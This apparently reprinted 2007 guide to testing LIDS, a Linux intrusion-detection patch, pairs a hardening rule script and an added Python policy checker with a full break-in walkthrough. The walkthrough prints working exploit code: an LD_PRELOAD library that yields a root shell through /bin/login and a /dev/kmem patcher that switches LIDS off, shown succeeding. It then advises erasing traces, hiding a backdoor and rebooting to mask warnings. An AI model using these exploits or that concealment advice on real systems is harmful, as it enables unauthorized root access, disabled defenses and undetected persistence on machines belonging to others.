Linux IDS Guide (5)

Published: 2007-06-23

IV. Testing LIDS

1. Functional testing:

Configuration script:
-----------------------------
#!/bin/sh

# Flush old rules
/sbin/lidsconf -Z

# Protect /etc/lids
/sbin/lidsconf -A -o /etc/lids -j DENY

# Protect System Binaries
/sbin/lidsconf -A -o /sbin -j READONLY
/sbin/lidsconf -A -o /bin -j READONLY

# Protect all of /usr and /usr/local
/sbin/lidsconf -A -o /usr -j READONLY
/sbin/lidsconf -A -o /usr/local -j READONLY

# Protect the System Libraries
/sbin/lidsconf -A -o /lib -j READONLY

# Protect System Configuration files
/sbin/lidsconf -A -o /etc/rc.d -j READONLY
/sbin/lidsconf -A -o /etc/rc0.d -j READONLY
/sbin/lidsconf -A -o /etc/rc1.d -j READONLY
/sbin/lidsconf -A -o /etc/rc2.d -j READONLY
/sbin/lidsconf -A -o /etc/rc3.d -j READONLY
/sbin/lidsconf -A -o /etc/rc4.d -j READONLY
/sbin/lidsconf -A -o /etc/rc5.d -j READONLY
/sbin/lidsconf -A -o /etc/rc6.d -j READONLY
/sbin/lidsconf -A -o /etc/init.d -j READONLY
/sbin/lidsconf -A -o /etc/rc.local -j READONLY
/sbin/lidsconf -A -o /etc/rc.sysinit -j READONLY
/sbin/lidsconf -A -o /etc/sysconfig -j READONLY
/sbin/lidsconf -A -o /etc/hosts -j READONLY
/sbin/lidsconf -A -o /etc/hosts.allow -j READONLY
/sbin/lidsconf -A -o /etc/hosts.deny -j READONLY
/sbin/lidsconf -A -o /etc/passwd -j READONLY
/sbin/lidsconf -A -o /etc/shadow -j DENY
/sbin/lidsconf -A -o /etc/lilo.conf -j DENY

# Enable system authentication
/sbin/lidsconf -A -s /bin/login -o /etc/shadow -j READONLY
/sbin/lidsconf -A -s /bin/su -o /etc/shadow -j READONLY
/sbin/lidsconf -A -s /bin/su -o CAP_SETUID -j GRANT
/sbin/lidsconf -A -s /bin/su -o CAP_SETGID -j GRANT
/sbin/lidsconf -A -s /bin/login -o CAP_SETUID -j GRANT
/sbin/lidsconf -A -s /bin/login -o CAP_SETGID -j GRANT
/sbin/lidsconf -A -s /bin/login -o CAP_CHOWN -j GRANT
/sbin/lidsconf -A -s /bin/login -o CAP_FSETID -j GRANT

# Protect the boot partition
/sbin/lidsconf -A -o /boot -j READONLY

# Protect root's home dir, but allow bash history
/sbin/lidsconf -A -o /root -j READONLY
/sbin/lidsconf -A -s /bin/bash -o /root/.bash_history -j WRITE

# Protect system logs
/sbin/lidsconf -A -o /var/log -j APPEND
/sbin/lidsconf -A -o /var/log/dmesg -j WRITE
/sbin/lidsconf -A -s /bin/login -o /var/log/wtmp -j WRITE
/sbin/lidsconf -A -s /bin/login -o /var/log/lastlog -j WRITE
/sbin/lidsconf -A -s /sbin/init -o /var/log/wtmp -j WRITE
/sbin/lidsconf -A -s /sbin/init -o /var/log/lastlog -j WRITE
/sbin/lidsconf -A -s /sbin/halt -o /var/log/wtmp -j WRITE
/sbin/lidsconf -A -s /sbin/halt -o /var/log/lastlog -j WRITE
/sbin/lidsconf -A -s /etc/rc.d/rc.sysinit -o /var/log/wtmp -i 1 -j WRITE
/sbin/lidsconf -A -s /etc/rc.d/rc.sysinit -o /var/log/lastlog -i 1 -j WRITE

# Shutdown
/sbin/lidsconf -A -s /sbin/init -o CAP_INIT_KILL -j GRANT
/sbin/lidsconf -A -s /sbin/init -o CAP_KILL -j GRANT
# Give the following init script the proper privileges to kill processes and
# unmount the file systems. However, anyone who can execute these scripts
# by themselves can effectively kill your processes. It's better than
# the alternative, however.
/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_INIT_KILL -i 1 -j GRANT
/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_KILL -i 1 -j GRANT
/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_NET_ADMIN -i 1 -j GRANT
/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_SYS_ADMIN -i 1 -j GRANT
/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_SYS_RAWIO -i 1 -j GRANT

# Other
/sbin/lidsconf -A -s /sbin/update -o CAP_SYS_ADMIN -j GRANT
/sbin/lidsconf -A -s /sbin/consoletype -o CAP_SYS_ADMIN -j GRANT

#Protect and hide Httpd
/sbin/lidsconf -A -o /etc/httpd -j DENY
/sbin/lidsconf -A -s /usr/sbin/httpd -o /etc/httpd -j READONLY
/sbin/lidsconf -A -s /usr/sbin/httpd -o CAP_HIDDEN -j GRANT
------------------------------
Run /sbin/lidsadm -S -- -LIDS to switch the system into the state where LIDS protection is off (every lidsadm -S switch prompts for the LIDS password), then execute the configuration script, run /sbin/lidsadm -S -- +RELOAD_CONF to reload the LIDS configuration, and finally run lidsadm -S -- +LIDS to switch protection back on.
Then test the files, directories and processes that LIDS protects with commands such as ls /etc/shadow, ls /etc/lids, touch /sbin/x and ps ax | grep http: the DENY rules should make /etc/shadow and /etc/lids appear not to exist, the READONLY rule on /sbin should make touch fail with "Operation not permitted", and the CAP_HIDDEN grant should keep httpd out of the process list. Use a scanner to test LIDS's detection and response functions as well. The best approach is to imitate what an intruder does after a successful break-in, such as installing a rootkit, and verify that each of the main LIDS functions holds up.

2. Vulnerability testing:
With LD_PRELOAD one can build a shared library that runs arbitrary code inside any program listed in the LIDS configuration, because LIDS attaches its grants to the executable's path rather than to the user who runs it. An intruder therefore obtains whatever privileges and file access the configuration gives that program; if it has been granted CAP_SYS_RAWIO or CAP_SYS_MODULE, the intruder can switch LIDS off and gain access to every file, and under some configurations root privileges as well.
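Both of the tests above, the functional check of which paths a given program may touch and the search for capability grants that an LD_PRELOADed library could abuse, can be driven from the rule script itself instead of by hand. The following Python policy checker is an added example, not code from the original article or from the LIDS project. It parses lidsconf -A lines using the semantics the article relies on (the longest matching object path wins, and a rule with a -s subject overrides the default rule for that subject); the sample rules embedded in it are a subset copied from the configuration script above, and the names RISKY_CAPS, effective_access and capability_findings are chosen here. Check its matching logic against the lidsconf man page before trusting it on a live kernel.

```python
"""Static checker for a lidsconf rule script: added example, not code from the
article or the LIDS project.  It reads lines of the form
    /sbin/lidsconf -A [-s SUBJECT] -o OBJECT [-i LEVEL] -j ACTION
and answers what the article checks by hand: the access a program has to a
path, and which capability grants an LD_PRELOADed library could abuse."""
import shlex
from dataclasses import dataclass
from typing import Optional

# Capabilities the walkthrough abuses: CAP_SETUID/CAP_SETGID give the root shell
# through /bin/login, CAP_SYS_RAWIO opens /dev/kmem, CAP_SYS_ADMIN and
# CAP_SYS_MODULE let an intruder switch LIDS off outright.
RISKY_CAPS = {"CAP_SETUID", "CAP_SETGID", "CAP_SYS_RAWIO", "CAP_SYS_ADMIN", "CAP_SYS_MODULE"}

# Constructed sample input: a subset of the rules in the configuration script above.
SAMPLE_RULES = """
/sbin/lidsconf -Z
/sbin/lidsconf -A -o /sbin -j READONLY
/sbin/lidsconf -A -o /etc/shadow -j DENY
/sbin/lidsconf -A -s /bin/login -o /etc/shadow -j READONLY
/sbin/lidsconf -A -s /bin/login -o CAP_SETUID -j GRANT
/sbin/lidsconf -A -o /root -j READONLY
/sbin/lidsconf -A -s /bin/bash -o /root/.bash_history -j WRITE
/sbin/lidsconf -A -o /var/log -j APPEND
/sbin/lidsconf -A -o /var/log/dmesg -j WRITE
/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_SYS_RAWIO -i 1 -j GRANT
"""


@dataclass
class Rule:
    subject: Optional[str]  # None for a default rule that applies to every process
    obj: str                # a path or a CAP_* name
    inherit: int            # -i level: 0 = subject only, >0 = children inherit it
    action: str             # DENY / READONLY / APPEND / WRITE / GRANT


def parse_rules(text):
    rules = []
    for line in text.splitlines():
        argv = shlex.split(line, comments=True)
        if not argv or not argv[0].endswith("lidsconf") or "-A" not in argv:
            continue  # skip blank lines, comments, -Z (flush) and non-ADD commands
        opts = {"-s": None, "-o": None, "-i": "0", "-j": None}
        for flag, value in zip(argv[1:], argv[2:]):  # pair each flag with its argument
            if flag in opts:
                opts[flag] = value
        if opts["-o"] is None or opts["-j"] is None:
            raise ValueError("malformed rule: " + line)
        rules.append(Rule(opts["-s"], opts["-o"], int(opts["-i"]), opts["-j"]))
    return rules


def _covers(rule_path, path):
    """True when rule_path is path itself or one of its ancestor directories."""
    return path == rule_path or path.startswith(rule_path.rstrip("/") + "/")


def effective_access(rules, path, subject=None):
    """DENY/READONLY/APPEND/WRITE for `subject` (None = any unlisted program) on
    `path`, or None when no rule covers the path and LIDS adds no restriction."""
    best = None
    for r in rules:
        if r.obj.startswith("CAP_") or not _covers(r.obj, path):
            continue
        if r.subject is not None and r.subject != subject:
            continue
        # The longest object path wins; at equal length the subject-specific rule
        # beats the default one, which is how /bin/login gets to read /etc/shadow.
        key = (len(r.obj.rstrip("/")), r.subject is not None)
        if best is None or key > best[0]:
            best = (key, r.action)
    return best[1] if best else None


def capability_findings(rules):
    """Risky GRANTs a local user can reach by running the subject with LD_PRELOAD."""
    findings = []
    for r in rules:
        if r.action == "GRANT" and r.subject and r.obj in RISKY_CAPS:
            scope = "inherited by child processes" if r.inherit else "subject only"
            findings.append(f"{r.subject} is granted {r.obj} ({scope})")
    return findings


if __name__ == "__main__":
    policy = parse_rules(SAMPLE_RULES)
    for prog, path in [(None, "/sbin/x"), (None, "/etc/shadow"), ("/bin/login", "/etc/shadow")]:
        print(f"{prog or '<default>'} on {path}: {effective_access(policy, path, prog)}")
    for finding in capability_findings(policy):
        print("FINDING:", finding)
```

Feed it the real rule script (parse_rules(open("rules.sh").read())) and compare its answers with what ls, touch and ps report after the reload; any GRANT it lists is a program that must either be statically linked or never be runnable by an untrusted user, and an inherited grant to a shell script, such as the halt script's CAP_SYS_RAWIO, is the weakest point of the whole policy.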

The test program can be downloaded from:
http://www.lids.org/download/test-lids.sh
http://www.lids.org/download/test-lids.sh.asc

Now let us break into a Linux box that has LIDS installed; the LIDS in question is, naturally, a version with this bug.
The first step is to obtain an ordinary user account, whether through finger, sendmail or social engineering; that should not stop anyone here. Any account will do as long as it allows remote login, and a local login is better still.

[test@rh72 test]$ls /proc/sys
abi debug dev fs kernel lids net proc
[test@rh72 test]$ls /sbin/lids*
/sbin/lidsadm /sbin/lidsconf
-- so LIDS is installed on this system: /proc/sys/lids exists and the lidsadm and lidsconf tools are present

[test@rh72 test]$vi testlids.sh
-------------------------------
#!/bin/sh

# Creates /tmp/boom.so, which you might
# use to let LIDS leak capabilities
# to your shell.

cat > /tmp/boom.c <<'_EOF_'
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>

/* Runs when the .so is loaded via LD_PRELOAD, before the host program's main(). */
int _init(void)
{
    char *a[] = {"/bin/bash", NULL};
    setuid(0);                  /* succeeds only if the host program holds CAP_SETUID */
    close(0); close(1); close(2);
    open("/dev/tty", O_RDWR);   /* reattach stdin/stdout/stderr to the terminal */
    dup(0);
    dup(1);
    execve(*a, a, NULL);        /* replace the host program with a shell */
    return -1;
}
_EOF_

cc -c -fPIC /tmp/boom.c -o /tmp/boom.o
ld -Bshareable /tmp/boom.o -o /tmp/boom.so
echo "OK";
------------------------------
[test@rh72 test]$ chmod +x testlids.sh
[test@rh72 test]$ ./testlids.sh
OK
[test@fire lids]$ LD_PRELOAD=/tmp/boom.so /bin/login
[root@fire lids]# whoami
root
Wow, root that easily, more easily than on a Linux box without LIDS! :)
So on a system running a LIDS with this bug, an ordinary user can obtain superuser privileges directly through LD_PRELOAD; administrators who deploy LIDS must keep it upgraded and configure it with care.

(Root is obtained directly through /bin/login because of the following LIDS configuration entries:
/sbin/lidsconf -A -s /bin/login -o CAP_SETUID -j GRANT
/sbin/lidsconf -A -s /bin/login -o CAP_SETGID -j GRANT
/sbin/lidsconf -A -s /bin/login -o CAP_CHOWN -j GRANT
/sbin/lidsconf -A -s /bin/login -o CAP_FSETID -j GRANT
LIDS grants these capabilities to any process that executes /bin/login, whoever started it; /bin/login is not set-uid, so the dynamic loader honours LD_PRELOAD, and the preloaded _init runs with CAP_SETUID, which is why its setuid(0) succeeds.)

[root@fire lids]# ./capscan -b (capscan probes which capability restrictions LIDS imposes on the current process)
b 5 CAP_KILL
[root@fire lids]# touch /sbin/xlids
touch: /sbin/xlids: Operation not permitted
[root@fire lids]#LD_PRELOAD=/tmp/boom.so /etc/rc.d/init.d/halt
[root@fire lids]# ./capscan -b
b 5 CAP_KILL
b 12 CAP_NET_ADMIN
b 17 CAP_SYS_RAWIO
b 21 CAP_SYS_ADMIN
b 27 CAP_MKNOD
-- the shell has now picked up CAP_NET_ADMIN, CAP_SYS_RAWIO and CAP_SYS_ADMIN (and CAP_MKNOD) from the halt script, whose grants are marked -i 1 and are therefore inherited by its child processes
[root@fire lids]# touch /sbin/xlids
touch: /sbin/xlids: Operation not permitted
[root@fire lids]# ls -al /etc/lids
ls: /etc/lids: No such file or directory
[root@fire lids]# /sbin/lidsconf -L
LIST
LIDS: lidsconf(dev 3:1 inode 150018) pid 630 ppid 581 uid/gid (0/0) on (vc/1):
access hidden file /etc/lids/lids.conf
lidsconf:cannot open /etc/lids/lids.conf
reason: No such file or directory
-- LIDS is still active and still protects /sbin and /etc/lids: /sbin is read-only, and /etc/lids is denied and therefore hidden
[root@fire lids]#vi lidsoff.c
-------------------------------------
/* lidsoff.c: sets the kernel variable lids_load to 0 */

/* Simple and stupid kmem patcher for LIDS.
 * Licensed under the GPL. :-)
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>

void die(const char *s)
{
    perror(s);
    exit(errno);
}

int main(int argc, char **argv)
{
    char zero;
    off_t off;
    int kmem;

    if (argc < 2) {
        printf("Usage: %s <hex kernel address>\n\n", *argv);
        return 1;
    }

    /* Opening /dev/kmem for writing needs CAP_SYS_RAWIO, inherited from the halt script above. */
    kmem = open("/dev/kmem", O_RDWR);
    if (kmem < 0)
        die("open");

    /* The argument is the address of lids_local_on; lids_load sits 4 bytes before it (see /proc/ksyms below). */
    off = strtoul(argv[1], 0, 16);
    printf("# Patching [%lx]\n", (unsigned long)(off - 4));

    lseek(kmem, off - 4, SEEK_SET);
    if (read(kmem, &zero, sizeof(zero)) != sizeof(zero))
        die("read");
    printf("%d -> 0\n", zero);

    lseek(kmem, off - 4, SEEK_SET);
    zero = 0;
    if (write(kmem, &zero, sizeof(zero)) != sizeof(zero))
        die("write");
    close(kmem);
    return 0;
}
-----------------------------------
[root@fire lids]# gcc -o lidsoff lidsoff.c
[root@fire lids]# grep lids /proc/ksyms
c0113868 lids_send_message_Rsmp_ccaa3a65
c029af60 lids_load_Rsmp_a57ab5ad
c029af64 lids_local_on_Rsmp_641824fe
c029af6c lids_local_pid_Rsmp_2a2dd337
c0129270 lids_local_off_Rsmp_445f75c1
[root@fire lids]# ./lidsoff
Usage: ./lidsoff
[root@fire lids]# ./lidsoff c029af64
# Patching [c029af60]
1 -> 0
Ha, LIDS is switched off and no longer enforces anything!
[root@fire lids]# ls /etc/lids/lids.conf
/etc/lids/lids.conf
[root@fire lids]# touch /sbin/xlids
At this point we have full control of the LIDS-protected Linux box; easy, isn't it? Finally, don't forget to wipe your tracks and install a backdoor; LIDS itself can hide the backdoor's directories and processes, so a rootkit is not even needed. When finished, switch LIDS back to its previous state, otherwise the administrator will spot the intrusion at once. Some warnings may have appeared on the victim's console; the best remedy is a reboot or burying them under scanner noise. :) For the defending side, note that every access LIDS refused along the way was logged by the kernel, like the lidsconf message shown above, so forwarding those messages off the host is what turns this walkthrough into an alert. (End)

Reprinted from: http://www.ltesting.net